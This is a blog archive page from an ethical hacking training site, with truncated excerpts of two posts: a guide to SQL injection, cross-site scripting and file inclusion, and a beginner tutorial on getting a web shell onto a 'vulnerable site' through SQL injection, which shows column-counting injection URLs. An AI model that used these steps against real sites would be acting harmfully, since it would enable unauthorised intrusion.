Daily Archives: July 27, 2016

Home » July 2016 » Archives for July 27, 2016

(MySQL injection–Cross Site Scripting–File inclusion) Practical Approach Guide

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Table of Contents

Introduction
 
MySQL injection▸ How does MySQL injection work?
▸ How do our malicious queries get executed?

Cross Site Scripting▸ How does Cross Site Scripting work?
▸ How do our malicious vectors get executed?

File inclusion▸ How does Local & Remote File Inclusion work?
▸ How do we […]

By |July 27th, 2016|Papers|

SQL Injection to shell for beginners

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Mike

Hello Everyone,

Today, we will see how to upload a shell through SQL injection (+No needed an Admin Panel),

Requirements:

Vulnerable site.
Shell in txt format [Example: http://.com/shell.txt].
Your Brain (;

~~~
Firstly, we need to use order by statement to count the number of columns.
http://.com/index.php?id=1+order+by+1–
http://.com/index.php?id=1+order+by+2–
http://.com/index.php?id=1+order+by+3–
http://.com/index.php?id=1+order+by+4–
We […]

By |July 27th, 2016|Papers|